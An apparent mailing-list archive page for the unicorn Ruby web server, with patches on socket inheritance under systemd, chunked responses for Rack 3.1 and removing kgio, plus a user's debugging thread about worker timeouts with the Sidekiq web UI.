-    resp = `curl -H 'X-Expect-Size: #{tmp.size}' --tcp-nodelay \
-            -isSf --no-buffer -T- http://#@addr:#@port/ < #{tmp.path}`
-    assert $?.success?, 'curl ran OK'
-    assert_match(%r!\b#{sha1}\b!, resp)
-    assert_match(/sysread_read_byte_match/, resp)
-    assert_match(/expect_size_match/, resp)
-  end
-
-  private
-
-  def length
-    @bs * @count
-  end
-
-  def start_server(app)
-    redirect_test_io do
-      @server = HttpServer.new(app, :listeners => [ "#{@addr}:#{@port}" ] )
-      @server.start
-    end
-  end
-
-end

[-- Attachment #23: 0022-drop-redundant-IO-close_on_exec-false-calls.patch --]
[-- Type: text/x-diff, Size: 891 bytes --]

From 841b9e756beb1aa00d0f89097a808adcbbf45397 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:51 +0000
Subject: [PATCH 22/23] drop redundant IO#close_on_exec=false calls

Passing the `{ FD => IO }' mapping to #spawn or #exec already
ensures Ruby will clear FD_CLOEXEC on these FDs before execve(2).
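
A small standalone sketch of that behavior (the child command is only
for demonstration):

  require 'socket'
  require 'rbconfig'

  srv = TCPServer.new('127.0.0.1', 0)
  srv.close_on_exec = true          # the Ruby >= 2.0 default
  env = { 'FD' => srv.fileno.to_s }
  cmd = [RbConfig.ruby, '-e', 'p IO.for_fd(Integer(ENV["FD"]))']
  # the { fd => IO } mapping tells Ruby to keep that descriptor open
  # (i.e. clear FD_CLOEXEC) in the child; no manual fiddling needed
  pid = spawn(env, *cmd, srv.fileno => srv)
  Process.wait(pid)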
---
 lib/unicorn/http_server.rb | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 348e745..dd92b38 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -472,10 +472,7 @@ def worker_spawn(worker)
 
   def listener_sockets
     listener_fds = {}
-    LISTENERS.each do |sock|
-      sock.close_on_exec = false
-      listener_fds[sock.fileno] = sock
-    end
+    LISTENERS.each { |sock| listener_fds[sock.fileno] = sock }
     listener_fds
   end
 

[-- Attachment #24: 0023-LISTEN_FDS-inherited-sockets-are-immortal-across-SIG.patch --]
[-- Type: text/x-diff, Size: 3229 bytes --]

From 6ff8785c9277c5978e6dc01cb1b3da25d6bae2db Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:52 +0000
Subject: [PATCH 23/23] LISTEN_FDS-inherited sockets are immortal across SIGHUP

When using systemd-style socket activation, consider the
inherited socket immortal and do not drop it on SIGHUP.
This means configs w/o any `listen' directives at all can
continue to work after SIGHUP.

I only noticed this while writing some tests in Perl 5 and
the test suite is two lines shorter to test this feature :>
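
For reference, the sd_listen_fds() emulation amounts to something like
this (sketch only; the real code lives in inherit_listeners!):

  require 'socket'

  SD_LISTEN_FDS_START = 3
  def systemd_sockets
    return [] unless ENV['LISTEN_PID'].to_i == $$  # $$ can never be zero
    nfds = ENV['LISTEN_FDS'].to_i
    (SD_LISTEN_FDS_START...(SD_LISTEN_FDS_START + nfds)).map do |fd|
      io = Socket.for_fd(fd)
      io.autoclose = false  # immortal: survives SIGHUP listener rebinding
      io
    end
  end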
---
 lib/unicorn/http_server.rb  | 7 ++++++-
 t/client_body_buffer_size.t | 1 -
 t/integration.t             | 1 -
 3 files changed, 6 insertions(+), 3 deletions(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index dd92b38..f1b4a54 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -77,6 +77,7 @@ def initialize(app, options = {})
     options[:use_defaults] = true
     self.config = Unicorn::Configurator.new(options)
     self.listener_opts = {}
+    @immortal = [] # immortal inherited sockets from systemd
 
     # We use @self_pipe differently in the master and worker processes:
     #
@@ -158,6 +159,7 @@ def listeners=(listeners)
     end
     set_names = listener_names(listeners)
     dead_names.concat(cur_names - set_names).uniq!
+    dead_names -= @immortal.map { |io| sock_name(io) }
 
     LISTENERS.delete_if do |io|
       if dead_names.include?(sock_name(io))
@@ -807,17 +809,20 @@ def inherit_listeners!
     # inherit sockets from parents, they need to be plain Socket objects
     # before they become Kgio::UNIXServer or Kgio::TCPServer
     inherited = ENV['UNICORN_FD'].to_s.split(',')
+    immortal = []
 
     # emulate sd_listen_fds() for systemd
     sd_pid, sd_fds = ENV.values_at('LISTEN_PID', 'LISTEN_FDS')
     if sd_pid.to_i == $$ # n.b. $$ can never be zero
       # 3 = SD_LISTEN_FDS_START
-      inherited.concat((3...(3 + sd_fds.to_i)).to_a)
+      immortal = (3...(3 + sd_fds.to_i)).to_a
+      inherited.concat(immortal)
     end
     # to ease debugging, we will not unset LISTEN_PID and LISTEN_FDS
 
     inherited.map! do |fd|
       io = Socket.for_fd(fd.to_i)
+      @immortal << io if immortal.include?(fd)
       io.autoclose = false
       io = server_cast(io)
       set_server_sockopt(io, listener_opts[sock_name(io)])
diff --git a/t/client_body_buffer_size.t b/t/client_body_buffer_size.t
index b1a99f3..3067f28 100644
--- a/t/client_body_buffer_size.t
+++ b/t/client_body_buffer_size.t
@@ -36,7 +36,6 @@ POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 seek($conf_fh, 0, SEEK_SET);
 truncate($conf_fh, 0);
 print $conf_fh <<EOM;
-listen "$host_port" # TODO: remove this requirement for SIGHUP
 after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
 EOM
 $ar->do_kill('HUP');
diff --git a/t/integration.t b/t/integration.t
index a568758..bb2ab51 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -17,7 +17,6 @@ my $u1 = "$tmpdir/u1";
 print $conf_fh <<EOM;
 early_hints true
 listen "$u1"
-listen "$host_port" # TODO: remove this requirement for SIGHUP
 EOM
 my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');

^ permalink raw reply related	[relevance 1%]

* [PATCH v2] chunk unterminated HTTP/1.1 responses for Rack 3.1
  @ 2023-06-05  9:12  3%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2023-06-05  9:12 UTC (permalink / raw)
  To: Jeremy Evans; +Cc: unicorn-public

Jeremy Evans <code@jeremyevans.net> wrote:
> We deprecated Rack::Chunked in Rack 3.0 and plan to remove it in Rack
> 3.1. I agree it would be best to deal with this now, I just wasn't sure
> how you wanted to handle it.  Your patch below to deal with it at the
> server level looks good, though it doesn't appear to remove the Chunked
> usage at line 69 of unicorn.rb.  I recommend that also be removed.

OK.  Also added HEAD and STATUS_WITH_NO_ENTITY_BODY checks...

No tests, yet; they'll be in Perl 5.  (I started rewriting a bunch
of tests in Perl 5 last year since tests are where Ruby's yearly
breaking changes are most unacceptable to me).

No trailers for responses yet, either; I didn't realize Rack::Chunked
added special support for that in 2020.

I care deeply about trailers in requests, but never used them
for responses.

--------8<-------
Subject: [PATCH v2] chunk unterminated HTTP/1.1 responses for Rack 3.1

Rack::Chunked will be gone in Rack 3.1, so provide a
non-middleware fallback which takes advantage of IO#write
supporting multiple arguments in Ruby 2.5+.

We still need to support Ruby 2.4, at least, since Rack 3.0
does.  So a new (GC-unfriendly) Unicorn::WriteSplat module now
exists for Ruby <= 2.4 users.
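
The fallback boils down to this pattern (sketch; the real code also
skips chunking for HEAD requests and bodyless status codes):

  # one write call per chunk: size line, payload, CRLF
  def write_chunked(socket, body)
    body.each do |b|
      socket.write("#{b.bytesize.to_s(16)}\r\n", b, "\r\n") # 2.5+ multi-arg
    end
  ensure
    socket.write("0\r\n\r\n".freeze)   # always terminate the chunked body
  end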
---
  v2: remove Rack::Chunked load attempt
      fix arity check for Ruby <= 2.4
      update docs + examples
Interdiff:
  diff --git a/Documentation/unicorn.1 b/Documentation/unicorn.1
  index d76d40f..b2c5e70 100644
  --- a/Documentation/unicorn.1
  +++ b/Documentation/unicorn.1
  @@ -176,7 +176,7 @@ As of Unicorn 0.94.0, RACK_ENV is exported as a process\-wide environment
   variable as well.  While not current a part of the Rack specification as
   of Rack 1.0.1, this has become a de facto standard in the Rack world.
   .PP
  -Note the Rack::ContentLength and Rack::Chunked middlewares are also
  +Note the Rack::ContentLength middleware is also
   loaded by "deployment" and "development", but no other values of
   RACK_ENV.  If needed, they must be individually specified in the
   RACKUP_FILE, some frameworks do not require them.
  diff --git a/examples/echo.ru b/examples/echo.ru
  index 14908c5..e982180 100644
  --- a/examples/echo.ru
  +++ b/examples/echo.ru
  @@ -19,7 +19,6 @@ def each(&block)
   
   end
   
  -use Rack::Chunked
   run lambda { |env|
     /\A100-continue\z/i =~ env['HTTP_EXPECT'] and return [100, {}, []]
     [ 200, { 'Content-Type' => 'application/octet-stream' },
  diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
  index c339024..afdf680 100644
  --- a/ext/unicorn_http/unicorn_http.rl
  +++ b/ext/unicorn_http/unicorn_http.rl
  @@ -28,11 +28,15 @@ void init_unicorn_httpdate(void);
   #define UH_FL_TO_CLEAR 0x200
   #define UH_FL_RESSTART 0x400 /* for check_client_connection */
   #define UH_FL_HIJACK 0x800
  -#define UH_FL_RES_CHUNK_OK (1U << 12)
  +#define UH_FL_RES_CHUNK_VER (1U << 12)
  +#define UH_FL_RES_CHUNK_METHOD (1U << 13)
   
   /* all of these flags need to be set for keepalive to be supported */
   #define UH_FL_KEEPALIVE (UH_FL_KAVERSION | UH_FL_REQEOF | UH_FL_HASHEADER)
   
  +/* we can only chunk responses for non-HEAD HTTP/1.1 requests */
  +#define UH_FL_RES_CHUNKABLE (UH_FL_RES_CHUNK_VER | UH_FL_RES_CHUNK_METHOD)
  +
   static unsigned int MAX_HEADER_LEN = 1024 * (80 + 32); /* same as Mongrel */
   
   /* this is only intended for use with Rainbows! */
  @@ -146,6 +150,9 @@ request_method(struct http_parser *hp, const char *ptr, size_t len)
   {
     VALUE v = rb_str_new(ptr, len);
   
  +  if (len != 4 || memcmp(ptr, "HEAD", 4))
  +    HP_FL_SET(hp, RES_CHUNK_METHOD);
  +
     rb_hash_aset(hp->env, g_request_method, v);
   }
   
  @@ -159,7 +166,7 @@ http_version(struct http_parser *hp, const char *ptr, size_t len)
     if (CONST_MEM_EQ("HTTP/1.1", ptr, len)) {
       /* HTTP/1.1 implies keepalive unless "Connection: close" is set */
       HP_FL_SET(hp, KAVERSION);
  -    HP_FL_SET(hp, RES_CHUNK_OK);
  +    HP_FL_SET(hp, RES_CHUNK_VER);
       v = g_http_11;
     } else if (CONST_MEM_EQ("HTTP/1.0", ptr, len)) {
       v = g_http_10;
  @@ -806,9 +813,9 @@ static VALUE HttpParser_keepalive(VALUE self)
   /* :nodoc: */
   static VALUE chunkable_response_p(VALUE self)
   {
  -  struct http_parser *hp = data_get(self);
  +  const struct http_parser *hp = data_get(self);
   
  -  return HP_FL_ALL(hp, RES_CHUNK_OK) ? Qtrue : Qfalse;
  +  return HP_FL_ALL(hp, RES_CHUNKABLE) ? Qtrue : Qfalse;
   }
   
   /**
  diff --git a/lib/unicorn.rb b/lib/unicorn.rb
  index 8b1cda7..b817b77 100644
  --- a/lib/unicorn.rb
  +++ b/lib/unicorn.rb
  @@ -66,7 +66,6 @@ def self.builder(ru, op)
   
         middleware = { # order matters
           ContentLength: nil,
  -        Chunked: nil,
           CommonLogger: [ $stderr ],
           ShowExceptions: nil,
           Lint: nil,
  diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
  index 342dd0b..0ed0ae3 100644
  --- a/lib/unicorn/http_response.rb
  +++ b/lib/unicorn/http_response.rb
  @@ -12,6 +12,12 @@ module Unicorn::HttpResponse
   
     STATUS_CODES = defined?(Rack::Utils::HTTP_STATUS_CODES) ?
                    Rack::Utils::HTTP_STATUS_CODES : {}
  +  STATUS_WITH_NO_ENTITY_BODY = defined?(
  +                 Rack::Utils::STATUS_WITH_NO_ENTITY_BODY) ?
  +                 Rack::Utils::STATUS_WITH_NO_ENTITY_BODY : begin
  +    warn 'Rack::Utils::STATUS_WITH_NO_ENTITY_BODY missing'
  +    {}
  +  end
   
     # internal API, code will always be common-enough-for-even-old-Rack
     def err_response(code, response_start_sent)
  @@ -40,7 +46,7 @@ def http_response_write(socket, status, headers, body,
         code = status.to_i
         msg = STATUS_CODES[code]
         start = req.response_start_sent ? ''.freeze : 'HTTP/1.1 '.freeze
  -      term = false
  +      term = STATUS_WITH_NO_ENTITY_BODY.include?(code) || false
         buf = "#{start}#{msg ? %Q(#{code} #{msg}) : status}\r\n" \
               "Date: #{httpdate}\r\n" \
               "Connection: close\r\n"
  diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
  index 4ae4c85..c2ba75e 100644
  --- a/lib/unicorn/socket_helper.rb
  +++ b/lib/unicorn/socket_helper.rb
  @@ -15,7 +15,7 @@ def kgio_tryaccept # :nodoc:
       end
     end
   
  -  if IO.instance_method(:write).arity # Ruby <= 2.4
  +  if IO.instance_method(:write).arity == 1 # Ruby <= 2.4
       require 'unicorn/write_splat'
       UNIXClient = Class.new(Kgio::Socket) # :nodoc:
       class UNIXSrv < Kgio::UNIXServer # :nodoc:
  diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
  index cea9791..fe98fcc 100644
  --- a/test/unit/test_server.rb
  +++ b/test/unit/test_server.rb
  @@ -196,7 +196,7 @@ def test_client_shutdown_writes
       # continue to process our request and never hit EOFError on our sock
       sock.shutdown(Socket::SHUT_WR)
       buf = sock.read
  -    assert_match %r{\bhello!\\n\b}, buf.split(/\r\n\r\n/).last
  +    assert_match %r{\bhello!\\n\b}, buf.split(/\r\n\r\n/, 2).last
       next_client = Net::HTTP.get(URI.parse("http://127.0.0.1:#@port/"))
       assert_equal 'hello!\n', next_client
       lines = File.readlines("test_stderr.#$$.log")

 Documentation/unicorn.1          |  2 +-
 examples/echo.ru                 |  1 -
 ext/unicorn_http/unicorn_http.rl | 18 ++++++++++++++++++
 lib/unicorn.rb                   |  5 ++---
 lib/unicorn/http_response.rb     | 27 ++++++++++++++++++++++++++-
 lib/unicorn/socket_helper.rb     | 18 ++++++++++++++++--
 lib/unicorn/write_splat.rb       |  7 +++++++
 test/unit/test_server.rb         |  2 +-
 8 files changed, 71 insertions(+), 9 deletions(-)
 create mode 100644 lib/unicorn/write_splat.rb

diff --git a/Documentation/unicorn.1 b/Documentation/unicorn.1
index d76d40f..b2c5e70 100644
--- a/Documentation/unicorn.1
+++ b/Documentation/unicorn.1
@@ -176,7 +176,7 @@ As of Unicorn 0.94.0, RACK_ENV is exported as a process\-wide environment
 variable as well.  While not current a part of the Rack specification as
 of Rack 1.0.1, this has become a de facto standard in the Rack world.
 .PP
-Note the Rack::ContentLength and Rack::Chunked middlewares are also
+Note the Rack::ContentLength middleware is also
 loaded by "deployment" and "development", but no other values of
 RACK_ENV.  If needed, they must be individually specified in the
 RACKUP_FILE, some frameworks do not require them.
diff --git a/examples/echo.ru b/examples/echo.ru
index 14908c5..e982180 100644
--- a/examples/echo.ru
+++ b/examples/echo.ru
@@ -19,7 +19,6 @@ def each(&block)
 
 end
 
-use Rack::Chunked
 run lambda { |env|
   /\A100-continue\z/i =~ env['HTTP_EXPECT'] and return [100, {}, []]
   [ 200, { 'Content-Type' => 'application/octet-stream' },
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index ba23438..afdf680 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -28,10 +28,15 @@ void init_unicorn_httpdate(void);
 #define UH_FL_TO_CLEAR 0x200
 #define UH_FL_RESSTART 0x400 /* for check_client_connection */
 #define UH_FL_HIJACK 0x800
+#define UH_FL_RES_CHUNK_VER (1U << 12)
+#define UH_FL_RES_CHUNK_METHOD (1U << 13)
 
 /* all of these flags need to be set for keepalive to be supported */
 #define UH_FL_KEEPALIVE (UH_FL_KAVERSION | UH_FL_REQEOF | UH_FL_HASHEADER)
 
+/* we can only chunk responses for non-HEAD HTTP/1.1 requests */
+#define UH_FL_RES_CHUNKABLE (UH_FL_RES_CHUNK_VER | UH_FL_RES_CHUNK_METHOD)
+
 static unsigned int MAX_HEADER_LEN = 1024 * (80 + 32); /* same as Mongrel */
 
 /* this is only intended for use with Rainbows! */
@@ -145,6 +150,9 @@ request_method(struct http_parser *hp, const char *ptr, size_t len)
 {
   VALUE v = rb_str_new(ptr, len);
 
+  if (len != 4 || memcmp(ptr, "HEAD", 4))
+    HP_FL_SET(hp, RES_CHUNK_METHOD);
+
   rb_hash_aset(hp->env, g_request_method, v);
 }
 
@@ -158,6 +166,7 @@ http_version(struct http_parser *hp, const char *ptr, size_t len)
   if (CONST_MEM_EQ("HTTP/1.1", ptr, len)) {
     /* HTTP/1.1 implies keepalive unless "Connection: close" is set */
     HP_FL_SET(hp, KAVERSION);
+    HP_FL_SET(hp, RES_CHUNK_VER);
     v = g_http_11;
   } else if (CONST_MEM_EQ("HTTP/1.0", ptr, len)) {
     v = g_http_10;
@@ -801,6 +810,14 @@ static VALUE HttpParser_keepalive(VALUE self)
   return HP_FL_ALL(hp, KEEPALIVE) ? Qtrue : Qfalse;
 }
 
+/* :nodoc: */
+static VALUE chunkable_response_p(VALUE self)
+{
+  const struct http_parser *hp = data_get(self);
+
+  return HP_FL_ALL(hp, RES_CHUNKABLE) ? Qtrue : Qfalse;
+}
+
 /**
  * call-seq:
  *    parser.next? => true or false
@@ -981,6 +998,7 @@ void Init_unicorn_http(void)
   rb_define_method(cHttpParser, "content_length", HttpParser_content_length, 0);
   rb_define_method(cHttpParser, "body_eof?", HttpParser_body_eof, 0);
   rb_define_method(cHttpParser, "keepalive?", HttpParser_keepalive, 0);
+  rb_define_method(cHttpParser, "chunkable_response?", chunkable_response_p, 0);
   rb_define_method(cHttpParser, "headers?", HttpParser_has_headers, 0);
   rb_define_method(cHttpParser, "next?", HttpParser_next, 0);
   rb_define_method(cHttpParser, "buf", HttpParser_buf, 0);
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 1a50631..b817b77 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -66,7 +66,6 @@ def self.builder(ru, op)
 
       middleware = { # order matters
         ContentLength: nil,
-        Chunked: nil,
         CommonLogger: [ $stderr ],
         ShowExceptions: nil,
         Lint: nil,
@@ -75,8 +74,8 @@ def self.builder(ru, op)
 
       # return value, matches rackup defaults based on env
       # Unicorn does not support persistent connections, but Rainbows!
-      # and Zbatery both do.  Users accustomed to the Rack::Server default
-      # middlewares will need ContentLength/Chunked middlewares.
+      # does.  Users accustomed to the Rack::Server default
+      # middlewares will need ContentLength middleware.
       case ENV["RACK_ENV"]
       when "development"
       when "deployment"
diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
index 19469b4..0ed0ae3 100644
--- a/lib/unicorn/http_response.rb
+++ b/lib/unicorn/http_response.rb
@@ -12,6 +12,12 @@ module Unicorn::HttpResponse
 
   STATUS_CODES = defined?(Rack::Utils::HTTP_STATUS_CODES) ?
                  Rack::Utils::HTTP_STATUS_CODES : {}
+  STATUS_WITH_NO_ENTITY_BODY = defined?(
+                 Rack::Utils::STATUS_WITH_NO_ENTITY_BODY) ?
+                 Rack::Utils::STATUS_WITH_NO_ENTITY_BODY : begin
+    warn 'Rack::Utils::STATUS_WITH_NO_ENTITY_BODY missing'
+    {}
+  end
 
   # internal API, code will always be common-enough-for-even-old-Rack
   def err_response(code, response_start_sent)
@@ -35,11 +41,12 @@ def append_header(buf, key, value)
   def http_response_write(socket, status, headers, body,
                           req = Unicorn::HttpRequest.new)
     hijack = nil
-
+    do_chunk = false
     if headers
       code = status.to_i
       msg = STATUS_CODES[code]
       start = req.response_start_sent ? ''.freeze : 'HTTP/1.1 '.freeze
+      term = STATUS_WITH_NO_ENTITY_BODY.include?(code) || false
       buf = "#{start}#{msg ? %Q(#{code} #{msg}) : status}\r\n" \
             "Date: #{httpdate}\r\n" \
             "Connection: close\r\n"
@@ -47,6 +54,12 @@ def http_response_write(socket, status, headers, body,
         case key
         when %r{\A(?:Date|Connection)\z}i
           next
+        when %r{\AContent-Length\z}i
+          append_header(buf, key, value)
+          term = true
+        when %r{\ATransfer-Encoding\z}i
+          append_header(buf, key, value)
+          term = true if /\bchunked\b/i === value # value may be Array :x
         when "rack.hijack"
           # This should only be hit under Rack >= 1.5, as this was an illegal
           # key in Rack < 1.5
@@ -55,12 +68,24 @@ def http_response_write(socket, status, headers, body,
           append_header(buf, key, value)
         end
       end
+      if !hijack && !term && req.chunkable_response?
+        do_chunk = true
+        buf << "Transfer-Encoding: chunked\r\n".freeze
+      end
       socket.write(buf << "\r\n".freeze)
     end
 
     if hijack
       req.hijacked!
       hijack.call(socket)
+    elsif do_chunk
+      begin
+        body.each do |b|
+          socket.write("#{b.bytesize.to_s(16)}\r\n", b, "\r\n".freeze)
+        end
+      ensure
+        socket.write("0\r\n\r\n".freeze)
+      end
     else
       body.each { |chunk| socket.write(chunk) }
     end
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 8a6f6ee..c2ba75e 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -15,6 +15,20 @@ def kgio_tryaccept # :nodoc:
     end
   end
 
+  if IO.instance_method(:write).arity == 1 # Ruby <= 2.4
+    require 'unicorn/write_splat'
+    UNIXClient = Class.new(Kgio::Socket) # :nodoc:
+    class UNIXSrv < Kgio::UNIXServer # :nodoc:
+      include Unicorn::WriteSplat
+      def kgio_tryaccept # :nodoc:
+        super(UNIXClient)
+      end
+    end
+    TCPClient.__send__(:include, Unicorn::WriteSplat)
+  else # Ruby 2.5+
+    UNIXSrv = Kgio::UNIXServer
+  end
+
   module SocketHelper
 
     # internal interface
@@ -135,7 +149,7 @@ def bind_listen(address = '0.0.0.0:8080', opt = {})
         end
         old_umask = File.umask(opt[:umask] || 0)
         begin
-          Kgio::UNIXServer.new(address)
+          UNIXSrv.new(address)
         ensure
           File.umask(old_umask)
         end
@@ -203,7 +217,7 @@ def server_cast(sock)
         Socket.unpack_sockaddr_in(sock.getsockname)
         TCPSrv.for_fd(sock.fileno)
       rescue ArgumentError
-        Kgio::UNIXServer.for_fd(sock.fileno)
+        UNIXSrv.for_fd(sock.fileno)
       end
     end
 
diff --git a/lib/unicorn/write_splat.rb b/lib/unicorn/write_splat.rb
new file mode 100644
index 0000000..7e6e363
--- /dev/null
+++ b/lib/unicorn/write_splat.rb
@@ -0,0 +1,7 @@
+# -*- encoding: binary -*-
+# compatibility module for Ruby <= 2.4, remove when we go Ruby 2.5+
+module Unicorn::WriteSplat # :nodoc:
+  def write(*arg) # :nodoc:
+    super(arg.join(''))
+  end
+end
diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index 98e85ab..fe98fcc 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -196,7 +196,7 @@ def test_client_shutdown_writes
     # continue to process our request and never hit EOFError on our sock
     sock.shutdown(Socket::SHUT_WR)
     buf = sock.read
-    assert_equal 'hello!\n', buf.split(/\r\n\r\n/).last
+    assert_match %r{\bhello!\\n\b}, buf.split(/\r\n\r\n/, 2).last
     next_client = Net::HTTP.get(URI.parse("http://127.0.0.1:#@port/"))
     assert_equal 'hello!\n', next_client
     lines = File.readlines("test_stderr.#$$.log")



^ permalink raw reply related	[relevance 3%]

* Re: unicorn worker being killed issue
  @ 2023-05-10 21:34  2%   ` subashkc1
  0 siblings, 0 replies; 200+ results
From: subashkc1 @ 2023-05-10 21:34 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Hi Eric,

Thanks for your reply, I'll try to answer all questions below



> subashkc1 subashkc1@protonmail.com wrote:
>
> > I have a weird issue that I'm having trouble debugging. I've
> > created a sample bare-bones rails app where the issue is
> > reproducible https://github.com/subashkc/sidekiq_webui_issue.
>
>
> That's too big and having https://enterprise.contribsys.com/ as
> a source in your Gemfile means I'm probably not able/allowed
> to inspect those gems.
>

I've removed the sidekiq pro gem from the Gemfile; it also happens with just the sidekiq gem

> Some general questions:
>
> * how are you starting unicorn and what is the config file?
> (mainly, is `preload_app' enabled? and any hooks?)  `preload_app true' is the most common source of problems if
> the rest of your application (including all dependencies)
> isn't equipped to handle fork.

unicorn is started just with `bundle exec unicorn` from a Procfile using foreman, with no other config options, so it's just 1 unicorn worker. It's a very bare-bones rails app to reproduce the issue; all I did was add the sidekiq gem and load up the sidekiq web UI to see the issue in action
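
(For anyone following along: the fork-safety concern Eric mentions above
usually shows up with a config along these lines; purely illustrative,
since this repro app has no unicorn config file at all.)

  # unicorn.conf.rb sketch: preload_app loads the app once in the master,
  # so per-process resources must be re-established after fork
  preload_app true

  before_fork do |server, worker|
    ActiveRecord::Base.connection.disconnect! if defined?(ActiveRecord::Base)
  end

  after_fork do |server, worker|
    ActiveRecord::Base.establish_connection if defined?(ActiveRecord::Base)
  end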
>
> * What are the RACK_ENV / RAILS_ENV?
>

It is happening locally, so all env are development

> `unicorn_rails' is actually pointless nowadays, and the plain `unicorn' command is highly recommended.

I'm only using the unicorn gem, not touching unicorn_rails at all

>
> Use a single worker for debugging, especially if you want to
> strace/truss the process.

Yeah, just using 1 unicorn worker with all the default configs (this repo doesn't have a unicorn config file, so all defaults)

>
> Fwiw, I haven't touched Rails in roughly a decade (and barely at
> that). My only web apps for the past 15 years or so are on bare
> Rack and meant to be consumed via curl or w3m (nothing involving
> JavaScript or fancy browsers).
>
> Maybe others watching this mailbox can chime in....
>
> > After running the rails app, and load up the sidekiq web UI,
> > if I click on any tabs e.g. busy/queues then the request is
> > served right away with a 200 but it seems there is a 2nd
> > request (can't tell where from) which eventually times out and
> > kills the unicorn worker.
>
>
> I suspect a 2nd request comes from some JS code. Check for a
> network debugging tool included with your browser if it has one.
>

Yeah, that's what I can't figure out; I can't see any other requests in the browser network tools

> Or use a single unicorn worker, then strace/truss that worker.
> Something like `strace -p $PID_OF_WORKER -f -v -s5000 -o /tmp/dump`
> (assuming Linux)

I did this, but the output was so verbose I couldn't make any sense of it as I wasn't sure what to look for

>
> Are you able to reproduce the issue with JS disabled?
> Preferably just via curl to minimize surprises.

Ok, it doesn't happen if I do the same request using curl, just doing `curl localhost:8080/sidekiq/busy`. But if I do this right after clicking on the tab in the UI, the curl request doesn't get served right away; it waits until the request from the UI times out (>60s) and kills the unicorn worker, and only then is the curl request served

>
> > I originally opened the issue with sidekiq repo but Mike
> > (sidekiq owner) wasn't able to find anything wrong with
> > sidekiq code and he suggested it seemed unicorn was double
> > reading the request and the 2nd one dies after 60s timeout.
>
>
> Double-reading a request is impossible unless there's something
> very broken in Ruby or your networking stack. There'd be
> hundreds of reports about it if Ruby or
> unicorn were double-reading requests.
>
> Are you going through some firewalls, or caching/scanning
> proxies which might send a request twice? I've seen that before.
>

No, this is all happening locally on my dev machine, no firewalls or proxies involved

> I have seen some folks accidentally enable multiple loggers,
> so it looks like a single request is happening multiple times.
>

No, just a very basic rails app with the default logger, haven't enabled or added anything else

> strace is usually my tool for debugging stuff like this; along
> with sprinkling `warn "#{LINE} ..."' statements throughout.
> And then perhaps commenting out lots of code and disabling
> as many dependencies as possible.

Yeah, it is a rails app with just the sidekiq gem, no other dependencies and no code to disable; I haven't added anything.

Let me know if that gives you some hints or if there are other things that I can try or check

Warm Regards

^ permalink raw reply	[relevance 2%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  2022-07-08  6:22  2%           ` Jean Boussier
@ 2022-09-21 22:16  0%             ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2022-09-21 22:16 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> Oh, that's what I missed, that makes sense. I'll try the C wrapper
> to send both the message and the IO at the same time.
> 
> Thanks again, I'll likely get back to you next week with a patch.

Btw, did you ever get anywhere with this?  I'll have to cut a
release at some point soonish since rack 3.0 was released
earlier this month and there's incompatibilities :<

^ permalink raw reply	[relevance 0%]

* [PATCH] Get rid of Kgio
@ 2022-07-08 13:17  2% Jean Boussier
  0 siblings, 0 replies; 200+ results
From: Jean Boussier @ 2022-07-08 13:17 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 17184 bytes --]

As discussed, kgio is no longer absolutely necessary.

We can use Ruby 2+ non-blocking IO capabilities instead.

Also available at https://github.com/casperisfine/unicorn.git (remove-kgio)
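
For context, the stdlib calls replacing kgio behave like this (the
patch rescues Errno::EAGAIN; `exception: false' is an equivalent
spelling):

  require 'socket'

  r, w = IO.pipe
  r.read_nonblock(11, exception: false)   # => :wait_readable, no raise

  srv = TCPServer.new('127.0.0.1', 0)
  srv.accept_nonblock(exception: false)   # => :wait_readable when idle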

---
  lib/unicorn.rb                 |  3 +--
  lib/unicorn/http_request.rb    | 15 +++++++++-----
  lib/unicorn/http_server.rb     | 33 +++++++++++++++++++++--------
  lib/unicorn/socket_helper.rb   | 20 ++++--------------
  lib/unicorn/stream_input.rb    | 16 ++++++++------
  lib/unicorn/worker.rb          | 38 ++++++++++++++++++++++------------
  t/oob_gc.ru                    |  2 +-
  t/oob_gc_path.ru               |  2 +-
  test/unit/test_request.rb      | 16 +++-----------
  test/unit/test_stream_input.rb |  7 ++-----
  test/unit/test_tee_input.rb    |  2 +-
  unicorn.gemspec                |  1 -
  12 files changed, 82 insertions(+), 73 deletions(-)

diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 1a50631..170719c 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
